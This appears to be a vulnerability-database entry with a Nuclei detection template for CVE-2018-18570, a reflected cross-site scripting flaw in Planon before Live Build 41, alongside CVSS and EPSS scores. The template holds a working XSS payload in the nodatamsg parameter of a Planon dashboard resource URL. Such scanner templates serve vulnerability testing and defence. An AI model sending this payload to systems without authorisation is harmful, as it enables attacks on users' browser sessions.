Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2018-18570
HistoryNov 03, 2021 - 6:06 a.m.

Planon <Live Build 41 - Cross-Site Scripting

2021-11-0306:06:30
ProjectDiscovery
github.com
3

4.3 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.001 Low

EPSS

Percentile

41.2%

Planon before Live Build 41 is vulnerable to cross-site scripting.

id: CVE-2018-18570

info:
  name: Planon <Live Build 41 - Cross-Site Scripting
  author: emadshanab
  severity: medium
  description: Planon before Live Build 41 is vulnerable to cross-site scripting.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary scripts in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Apply the latest patch or upgrade to a non-vulnerable version of Planon Live Build.
  reference:
    - https://www2.deloitte.com/de/de/pages/risk/articles/planon-cross-site-scripting.html
    - https://nvd.nist.gov/vuln/detail/CVE-2018-18570
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2018-18570
    cwe-id: CWE-79
    epss-score: 0.00098
    epss-percentile: 0.40792
    cpe: cpe:2.3:a:planonsoftware:planon:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: planonsoftware
    product: planon
  tags: cve,cve2018,xss,planon,planonsoftware

http:
  - method: GET
    path:
      - '{{BaseURL}}/wicket/resource/nl.planon.pssm.dashboard.cre.engine.wicket.page.AbstractDashboardPage/html/nodata.html?nodatamsg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "</script><script>alert(document.domain)</script>"

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022072a99586909e4df9893ddbe97f55ceea487163c8a6d2fa7bb1fd3f426fff0a31022100b894b36b035f3eb1fca2f1ff1dd4c79b5e5e1140d19e9ee8f1e90b9b36ac21e4:922c64590222798bb761d5b6d8e72950

4.3 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.001 Low

EPSS

Percentile

41.2%

Related for NUCLEI:CVE-2018-18570